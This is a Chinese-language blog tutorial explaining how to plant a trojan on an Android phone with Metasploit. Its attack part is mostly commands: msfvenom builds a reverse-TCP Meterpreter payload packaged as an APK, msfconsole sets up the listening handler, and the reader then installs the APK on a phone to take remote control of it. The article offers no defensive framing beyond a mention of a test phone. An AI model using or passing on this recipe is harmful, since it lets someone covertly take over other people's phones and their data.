Meterpreter教程(Android系统植入木马)

在Metasploit软件中,使用msfvenom命令创建被控制端payload,使用msfconsole命令启动主控制端Meterpreter,被控端payload运行,最后利用Meterpreter输入控制指令完成对被控端的远程控制。今天,错误博客( cuowu.com )分享的是《Meterpreter教程(Android操作系统植入木马)》。希望对大家有所帮助。

一、msfvenom生成被控端文件

Android系统需要生成apk文件,选择一个payload,设置参数,输出格式,输出位置。

1、查找适合Android的payload

msfvenom -l payloads

执行命令查看所有payloads,找到可以在Android运行的。

payload说明
payload说明

从name可以看出,我们需要选择一个Android/meterpreter/的payload,我们还是以tcp作为实例,那么就选择

Android/meterpreter/reverse_tcp

适用于Android系统的,采用meterpreter进行控制的,基于tcp的反向木马。首先查询一下这个payload的用法:

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

options

Android/meterpreter/reverse_tcp参数说明
Android/meterpreter/reverse_tcp参数说明

只需要设置主控电脑的ip和端口即可,端口随意,可以更改,也可以默认,ip直接命令查看kali linux的即可。

ip add show eth0

kali linux系统ip查询
kali linux系统ip查询

2、设置payload参数

set命令设置payload参数,如下:

set lhost 192.168.130.6

set lport 8888

设置payload参数
设置payload参数

3、输出被控端程序

确定好输出位置为kali linux桌面,/home/kali/Desktop/。

因为默认的程序类型中没有apk,所以不能像windows系统那样再使用-f exe的形式。这里需要使用的是保持文件原始格式的参数“R>”,并且这个参数也会直接指定位置,不需要再使用-o来指定输出位置。

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.130.6 lport=8888 R>/home/kali/Desktop/payload.apk

输出被控端程序
输出被控端程序

二、msfconsole启动主控端

我们在kali linux中启动metasploit,命令如下:

msfconsole

然后,主控端采用的Handler,handler包含3个参数:

被控端程序使用的payload

被控端程序使用的payload所用的IP

被控端程序使用的payload所用的端口

然后set设置一下即可,貌似在前面,我们查看参数的时候已经都设置好了。

那么我们直接启动并且用options进行查看就好。

发现正确之后,我们直接开启主控:

exploit

开启主控
开启主控

三、手机安装payload.apk

把之前生成的payload.apk传输到测试手机上,安装到手机上。按照上述过程生成的payload.apk在安装中报毒,而且在现在的高版本安卓机上会存在不确定的兼容性问题,提示“低版本可能无法运行”。

四、进入meterpreter控制

如果找到低版本适合的手机,就已经可以进入meterpreter控制了。

以上就是错误博客( cuowu.com )分享的是《Meterpreter教程(Android操作系统植入木马)》。感谢您的阅读。

百度搜索“错误博客”即可找到本站,微信搜索“小小课堂网”关注小小课堂网公众号。错误博客( cuowu.com )欢迎用户投稿,发布者:中二少年,文章版权归作者所有,投稿文章不代表错误博客立场,中二少年发布为错误博客原创文章,转载请注明出处:https://cuowu.com/2467.html

(6)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2021年6月29日 上午12:01
下一篇 2021年6月29日 上午12:12

相关推荐

发表评论

您的电子邮箱地址不会被公开。